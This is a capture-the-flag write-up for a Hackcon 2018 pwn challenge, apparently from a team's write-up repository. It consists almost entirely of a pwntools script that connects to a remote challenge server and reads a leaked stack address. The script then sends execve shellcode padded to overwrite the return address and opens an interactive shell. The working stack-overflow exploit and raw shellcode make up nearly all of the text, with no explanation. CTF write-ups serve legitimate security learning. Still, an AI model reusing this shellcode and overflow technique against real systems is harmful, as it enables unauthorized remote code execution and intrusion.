# She Sells Sea Shells
**Category**: pwn
**Points**: 90

# Write-Up
```python
from pwn import *

p = remote('139.59.30.165', 8900)
p.recvuntil("attached) ")
leak = int(p.recvline(),16)

print "leak : "+hex(leak)

shellcode= "\x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05"

payload = shellcode
payload += "A"*(72-len(payload))
payload += p64(leak)

p.sendline(payload)
p.interactive()
```

Original writeup (https://github.com/Ascope-Team/write-ups-2018/tree/master/Hackcon-2018/She%20Sells%20Sea%20Shells_pwn_90).